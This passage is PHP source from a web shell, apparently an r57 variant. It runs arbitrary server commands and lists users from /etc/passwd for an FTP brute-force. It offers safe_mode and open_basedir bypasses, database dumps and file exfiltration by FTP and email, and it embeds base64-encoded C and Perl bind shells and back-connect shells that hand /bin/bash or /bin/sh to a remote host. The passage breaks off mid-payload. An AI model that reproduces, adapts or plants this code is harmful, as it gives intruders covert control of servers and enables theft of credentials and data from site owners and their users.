echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
}
if(isset($_GET['delete']))
{
@unlink(__FILE__);
}
if(isset($_GET['tmp']))
{
@unlink("/tmp/bdpl");
@unlink("/tmp/back");
@unlink("/tmp/bd");
@unlink("/tmp/bd.c");
@unlink("/tmp/dp");
@unlink("/tmp/dpc");
@unlink("/tmp/dpc.c");
}
if(isset($_GET['phpini']))
{
echo $head;
function U_value($value)
{
if ($value == '') return '<i>no value</i>';
if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
if ($value === null) return 'NULL';
if (@is_object($value)) $value = (array) $value;
if (@is_array($value))
{
@ob_start();
print_r($value);
$value = @ob_get_contents();
@ob_end_clean();
}
return U_wordwrap((string) $value);
}
function U_wordwrap($str)
{
$str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
}
if (@function_exists('ini_get_all'))
{
$r = '';
echo '<table width=100%>', '<tr><td class=main bgcolor=#333333><font face=Verdana size=-2 color=#DF0000><div align=center><b>Directive</b></div></font></td><td class=main bgcolor=#333333><font face=Verdana size=-2 color=#DF0000><div align=center><b>Local Value</b></div></font></td><td class=main bgcolor=#333333><font face=Verdana size=-2 color=#DF0000><div align=center><b>Master Value</b></div></font></td></tr>';
foreach (@ini_get_all() as $key=>$value)
{
$r .= '<tr><td class=main>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td class=main><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td class=main><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
}
echo $r;
echo '</table>';
}
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
die();
}
if(isset($_GET['cpu']))
{
echo $head;
echo '<table width=100%><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2 color=#DF0000><b>CPU</b></font></div></td></tr></table><table width=100%>';
$cpuf = @file("cpuinfo");
if($cpuf)
{
$c = @sizeof($cpuf);
for($i=0;$i<$c;$i++)
{
$info = @explode(":",$cpuf[$i]);
if($info[1]==""){ $info[1]="---"; }
$r .= '<tr><td class=main>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td class=main><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
}
echo $r;
}
else
{
echo '<tr><td class=main>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
}
echo '</table>';
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
die();
}
if(isset($_GET['mem']))
{
echo $head;
echo '<table width=100%><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2 color=#DF0000><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
$memf = @file("meminfo");
if($memf)
{
$c = sizeof($memf);
for($i=0;$i<$c;$i++)
{
$info = explode(":",$memf[$i]);
if($info[1]==""){ $info[1]="---"; }
$r .= '<tr><td class=main>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td class=main><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
}
echo $r;
}
else
{
echo '<tr><td class=main>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
}
echo '</table>';
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
die();
}
$lang=array(
/* --------------------------------------------------------------- */
'eng_text1' =>'Executed command',
'eng_text2' =>'Execute command on server',
'eng_text3' =>'Run command',
'eng_text4' =>'Work directory',
'eng_text5' =>'Upload files on server',
'eng_text6' =>'Local file',
'eng_text7' =>'Aliases',
'eng_text8' =>'Select alias',
'eng_butt1' =>'Execute',
'eng_butt2' =>'Upload',
'eng_text9' =>'Bind port to /bin/bash',
'eng_text10'=>'Port',
'eng_text11'=>'Password for access',
'eng_butt3' =>'Bind',
'eng_text12'=>'back-connect',
'eng_text13'=>'IP',
'eng_text14'=>'Port',
'eng_butt4' =>'Connect',
'eng_text15'=>'Upload files from remote server',
'eng_text16'=>'With',
'eng_text17'=>'Remote file',
'eng_text18'=>'Local file',
'eng_text19'=>'Exploits',
'eng_text20'=>'Use',
'eng_text21'=>' New name',
'eng_text22'=>'datapipe',
'eng_text23'=>'Local port',
'eng_text24'=>'Remote host',
'eng_text25'=>'Remote port',
'eng_text26'=>'Use',
'eng_butt5' =>'Run',
'eng_text28'=>'Work in safe_mode',
'eng_text29'=>'ACCESS DENIED',
'eng_butt6' =>'Change',
'eng_text30'=>'Cat file',
'eng_butt7' =>'Show',
'eng_text31'=>'File not found',
'eng_text32'=>'Eval PHP code',
'eng_text33'=>'Test bypass open_basedir with cURL functions',
'eng_butt8' =>'Test',
'eng_text34'=>'Test bypass safe_mode with include function',
'eng_text35'=>'Test bypass with load file in mysql - edited by W.A.S',
'eng_text36'=>'Db . Table',
'eng_text37'=>'Login',
'eng_text38'=>'Password',
'eng_text39'=>'Database',
'eng_text40'=>'Dump database table',
'eng_butt9' =>'Dump',
'eng_text41'=>'Save dump in file',
'eng_text42'=>'Edit files',
'eng_text43'=>'File for edit',
'eng_butt10'=>'Save',
'eng_text44'=>'Can\'t edit file! Only read access!',
'eng_text45'=>'File saved',
'eng_text46'=>'Show phpinfo()',
'eng_text47'=>'Show variables from php.ini',
'eng_text48'=>'Delete temp files',
'eng_butt11'=>'Edit file',
'eng_text49'=>'Delete script from server',
'eng_text50'=>'View cpu info',
'eng_text51'=>'View memory info',
'eng_text52'=>'Find text',
'eng_text53'=>'In dirs',
'eng_text54'=>'Find text in files',
'eng_butt12'=>'Find',
'eng_text55'=>'Only in files',
'eng_text56'=>'Nothing :(',
'eng_text57'=>'Create/Delete File/Dir',
'eng_text58'=>'name',
'eng_text59'=>'file',
'eng_text60'=>'dir',
'eng_butt13'=>'Create/Delete',
'eng_text61'=>'File created',
'eng_text62'=>'Dir created',
'eng_text63'=>'File deleted',
'eng_text64'=>'Dir deleted',
'eng_text65'=>'Create',
'eng_text66'=>'Delete',
'eng_text67'=>'Chown/Chgrp/Chmod',
'eng_text68'=>'Command',
'eng_text69'=>'param1',
'eng_text70'=>'param2',
'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
'eng_text72'=>'Text for find',
'eng_text73'=>'Find in folder',
'eng_text74'=>'Find in files',
'eng_text75'=>'* you can use regexp',
'eng_text76'=>'Search text in files via find',
'eng_text80'=>'Type',
'eng_text81'=>'Net',
'eng_text82'=>'Databases',
'eng_text83'=>'Run SQL query',
'eng_text84'=>'SQL query',
'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
'eng_text86'=>'Download files from server',
'eng_butt14'=>'Download',
'eng_text87'=>'Download files from remote ftp-server',
'eng_text88'=>'FTP-server:port',
'eng_text89'=>'File on ftp',
'eng_text90'=>'Transfer mode',
'eng_text91'=>'Archivation',
'eng_text92'=>'without archivation',
'eng_text93'=>'FTP',
'eng_text94'=>'FTP-bruteforce',
'eng_text95'=>'Users list',
'eng_text96'=>'Can\'t get users list',
'eng_text97'=>'checked: ',
'eng_text98'=>'success: ',
'eng_text99'=>'* use username from /etc/passwd for ftp login and password',
'eng_text100'=>'Send file to remote ftp server',
'eng_text101'=>'Use reverse (user -> resu) login for password',
'eng_text102'=>'Mail',
'eng_text103'=>'Send email',
'eng_text104'=>'Send file to email',
'eng_text105'=>'To',
'eng_text106'=>'From',
'eng_text107'=>'Subj',
'eng_butt15'=>'Send',
'eng_text108'=>'Mail',
'eng_text109'=>'Hide',
'eng_text110'=>'Show',
'eng_text111'=>'SQL-Server : Port',
'eng_text112'=>'Test bypass safe_mode with function mb_send_mail',
'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list',
'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body',
'eng_text115'=>'Test bypass safe_mode, copy file via compress.zlib:// in function copy()',
'eng_text116'=>'Copy from',
'eng_text117'=>'to',
'eng_text118'=>'File copied',
'eng_text119'=>'Cant copy file',
'eng_text120'=>'SQL-Server',
'eng_err0'=>'Error! Can\'t write in file ',
'eng_err1'=>'Error! Can\'t read file ',
'eng_err2'=>'Error! Can\'t create ',
'eng_err3'=>'Error! Can\'t connect to ftp',
'eng_err4'=>'Error! Can\'t login on ftp server',
'eng_err5'=>'Error! Can\'t change dir on ftp',
'eng_err6'=>'Error! Can\'t sent mail',
'eng_err7'=>'Mail send',
'eng_text200'=>'read file from vul copy()',
'eng_text202'=>'where file in server',
'eng_text300'=>'read file from vul curl()',
'eng_text203'=>'read file from vul ini_restore()',
'eng_text204'=>'write shell from vul error_log()',
'eng_text205'=>'write shell in this side',
'eng_text206'=>'read dir',
'eng_text207'=>'read dir from vul reg_glob',
'eng_text208'=>'execute with function',
'eng_text209'=>'read dir from vul root',
'eng_text210'=>'DeZender ',
'eng_text211'=>'::safe_mode off::',
'eng_text212'=>'Close safe_mode with php.ini',
'eng_text213'=>'Close security_mod with .htaccess',
'eng_text214'=>'Admin name',
'eng_text215'=>'IRC server ',
'eng_text216'=>'#room name',
'eng_text217'=>'server',
'eng_text218'=>'write ini.php file to close safe_mode with ini_restore vul',
'eng_text219'=>'Get file to server in safe_mode and change name',
'eng_text220'=>'show file with symlink vul',
'eng_text221'=>'zip file in server to download',
'eng_text222'=>'2 symlink use vul',
'eng_text223'=>'read file from funcution',
'eng_text224'=>'read file from PLUGIN',
'eng_text225' => 'htaccess safemode and open_basedir bypass',
'eng_text226' => 'Write to file',
'eng_text227' => 'Content',
'eng_text228' => 'SSI safe_mode bypass',
'eng_text229' => 'COM functions safe_mode and disable_function bypass',
'eng_text230' => 'ionCube extension safe_mode bypass',
'eng_text231' => 'win32std extension safe_mode bypass',
'eng_text232' => 'win32service extension safe_mode bypass',
'eng_text233' => 'perl extension safe_mode bypass',
'eng_text234' => 'FFI extension safe_mode bypass',
'eng_butt65'=>'Write',
);
/*
?????? ??????
????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? )
?? ?????? ???? ????????? ??? ???????? ???????.
*/
$aliases=array(
'find suid files'=>'find / -type f -perm -04000 -ls',
'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
'find config.inc.php files'=>'find / -type f -name config.inc.php',
'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
'find config* files'=>'find / -type f -name "config*"',
'find config* files in current dir'=>'find . -type f -name "config*"',
'find all writable files'=>'find / -type f -perm -2 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories'=>'find / -type d -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files'=>'find / -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'find all service.pwd files'=>'find / -type f -name service.pwd',
'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
'find all .htpasswd files'=>'find / -type f -name .htpasswd',
'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
'find all .bash_history files'=>'find / -type f -name .bash_history',
'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
'find all .mysql_history files'=>'find / -type f -name .mysql_history',
'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
'list file attributes on a Linux second extended file system'=>'lsattr -va',
'show opened ports'=>'netstat -an | grep -i listen',
'----------------------------------------------------------------------------------------------------'=>'ls -la'
);
$table_up1 = "<tr><td class=main bgcolor=Black
><font face=Verdana size=-2><b><div class=tt align=center>:: ";
$table_up2 = " ::</div></b></font></td></tr><tr><td class=main>";
$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=Black><tr><td class=main>";
$table_end1 = "</td></tr>";
$arrow = " <font face=Webdings color=#DF0000>4</font>";
$lb = "<font color=#DF0000>[</font>";
$rb = "<font color=#DF0000>]</font>";
$font = "<font face=Verdana size=-2>";
$ts = "<table class=table1 width=100% align=center>";
$te = "</table>";
$fs = "<form name=form method=POST>";
$fe = "</form>";
if(isset($_GET['users']))
{
echo $head;
if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=#DF0000>".$lang[$language.'_text96']."</font></center>"; }
else
{
echo '<center><textarea cols=20 rows=20>';
foreach($users as $user) { echo $user."\n"; }
echo '</textarea></center>';
}
echo "<div align=center><br><b><a href=".$_SERVER['PHP_SELF']."?brute&page=crack><font size=5 color=Red>BRUTE IT!</font></b></a><br><br><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
}
if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
$dir = @getcwd();
$unix = 0;
if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
if(empty($dir))
{
$os = getenv('OS');
if(empty($os)){ $os = php_uname(); }
if(empty($os)){ $os ="-"; $unix=1; }
else
{
if(@eregi("^win",$os)) { $unix = 0; }
else { $unix = 1; }
}
}
if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
{
echo $head;
if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
$sr->SearchText(0,0);
$res = $sr->GetResultFiles();
$found = $sr->GetMatchesCount();
$titles = $sr->GetTitles();
$r = "";
if($found > 0)
{
$r .= "<TABLE width=100%>";
foreach($res as $file=>$v)
{
$r .= "<TR>";
$r .= "<TD class=main colspan=2><font face=Verdana size=-2><b>".ws(3);
$r .= (!$unix)? str_replace("/","\\",$file) : $file;
$r .= "</b></font></ TD>";
$r .= "</TR>";
foreach($v as $a=>$b)
{
$r .= "<TR>";
$r .= "<TD class=main align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
$r .= "<TD class=main><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
$r .= "</TR>\n";
}
}
$r .= "</TABLE>";
echo $r;
}
else
{
echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
}
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
die();
}
if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
function ws($i)
{
return @str_repeat(" ",$i);
}
function ex($cfe)
{
$res = '';
if (!empty($cfe))
{
if(function_exists('exec'))
{
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($cfe);
}
elseif(function_exists('system'))
{
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
function get_users()
{
$users = array();
if (file_exists('passwd.txt')) {
$rows=file('passwd.txt');
} else {
$rows=file('/etc/passwd');
}
if(!$rows) return 0;
foreach ($rows as $string)
{
$user = @explode(":",$string);
if(substr($string,0,1)!='#') array_push($users,$user[0]);
}
return $users;
}
function err($n,$txt='')
{
echo '<table width=100% cellpadding=0 cellspacing=0><tr><td class=main bgcolor=Black><font color=Red face=Verdana size=-2><div align=center><b>';
echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
if(!empty($txt)) { echo " $txt"; }
echo '</b></div></font></td></tr></table>';
return null;
}
function perms($mode)
{
if (!$GLOBALS['unix']) return 0;
if( $mode & 0x1000 ) { $type='p'; }
else if( $mode & 0x2000 ) { $type='c'; }
else if( $mode & 0x4000 ) { $type='d'; }
else if( $mode & 0x6000 ) { $type='b'; }
else if( $mode & 0x8000 ) { $type='-'; }
else if( $mode & 0xA000 ) { $type='l'; }
else if( $mode & 0xC000 ) { $type='s'; }
else $type='u';
$owner["read"] = ($mode & 00400) ? 'r' : '-';
$owner["write"] = ($mode & 00200) ? 'w' : '-';
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
$group["read"] = ($mode & 00040) ? 'r' : '-';
$group["write"] = ($mode & 00020) ? 'w' : '-';
$group["execute"] = ($mode & 00010) ? 'x' : '-';
$world["read"] = ($mode & 00004) ? 'r' : '-';
$world["write"] = ($mode & 00002) ? 'w' : '-';
$world["execute"] = ($mode & 00001) ? 'x' : '-';
if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
$s=sprintf("%1s", $type);
$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
return trim($s);
}
function in($type,$name,$size,$value,$checked=0)
{
$ret = "<input type=".$type." name=".$name." ";
if($size != 0) { $ret .= "size=".$size." "; }
$ret .= "value=\"".$value."\"";
if($checked) $ret .= " checked";
return $ret.">";
}
function which($pr)
{
$path = ex("which $pr");
if(!empty($path)) { return $path; } else { return $pr; }
}
function cf($fname,$text)
{
$w_file=@fopen($fname,"w") or err(0);
if($w_file)
{
@fputs($w_file,base64_decode($text));
@fclose($w_file);
}
}
function sr($l,$t1,$t2)
{
return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
}
if (!@function_exists("view_size"))
{
function view_size($size)
{
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
else {$size = $size . " B";}
return $size;
}
}
function DirFilesR($dir,$types='')
{
$files = Array();
if(($handle = @opendir($dir)))
{
while (false !== ($file = @readdir($handle)))
{
if ($file != "." && $file != "..")
{
if(@is_dir($dir."/".$file))
$files = @array_merge($files,DirFilesR($dir."/".$file,$types));
else
{
$pos = @strrpos($file,".");
$ext = @substr($file,$pos,@strlen($file)-$pos);
if($types)
{
if(@in_array($ext,explode(';',$types)))
$files[] = $dir."/".$file;
}
else
$files[] = $dir."/".$file;
}
}
}
@closedir($handle);
}
return $files;
}
class SearchResult
{
var $text;
var $FilesToSearch;
var $ResultFiles;
var $FilesTotal;
var $MatchesCount;
var $FileMatschesCount;
var $TimeStart;
var $TimeTotal;
var $titles;
function SearchResult($dir,$text,$filter='')
{
$dirs = @explode(";",$dir);
$this->FilesToSearch = Array();
for($a=0;$a<count($dirs);$a++)
$this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
$this->text = $text;
$this->FilesTotal = @count($this->FilesToSearch);
$this->TimeStart = getmicrotime();
$this->MatchesCount = 0;
$this->ResultFiles = Array();
$this->FileMatchesCount = Array();
$this->titles = Array();
}
function GetFilesTotal() { return $this->FilesTotal; }
function GetTitles() { return $this->titles; }
function GetTimeTotal() { return $this->TimeTotal; }
function GetMatchesCount() { return $this->MatchesCount; }
function GetFileMatchesCount() { return $this->FileMatchesCount; }
function GetResultFiles() { return $this->ResultFiles; }
function SearchText($phrase=0,$case=0) {
$qq = @explode(' ',$this->text);
$delim = '|';
if($phrase)
foreach($qq as $k=>$v)
$qq[$k] = '\b'.$v.'\b';
$words = '('.@implode($delim,$qq).')';
$pattern = "/".$words."/";
if(!$case)
$pattern .= 'i';
foreach($this->FilesToSearch as $k=>$filename)
{
$this->FileMatchesCount[$filename] = 0;
$FileStrings = @file($filename) or @next;
for($a=0;$a<@count($FileStrings);$a++)
{
$count = 0;
$CurString = $FileStrings[$a];
$CurString = @Trim($CurString);
$CurString = @strip_tags($CurString);
$aa = '';
if(($count = @preg_match_all($pattern,$CurString,$aa)))
{
$CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
$this->ResultFiles[$filename][$a+1] = $CurString;
$this->MatchesCount += $count;
$this->FileMatchesCount[$filename] += $count;
}
}
}
$this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
}
}
function getmicrotime()
{
list($usec,$sec) = @explode(" ",@microtime());
return ((float)$usec + (float)$sec);
}
$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
lIENPTk47DQpleGl0IDA7DQp9DQp9";
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
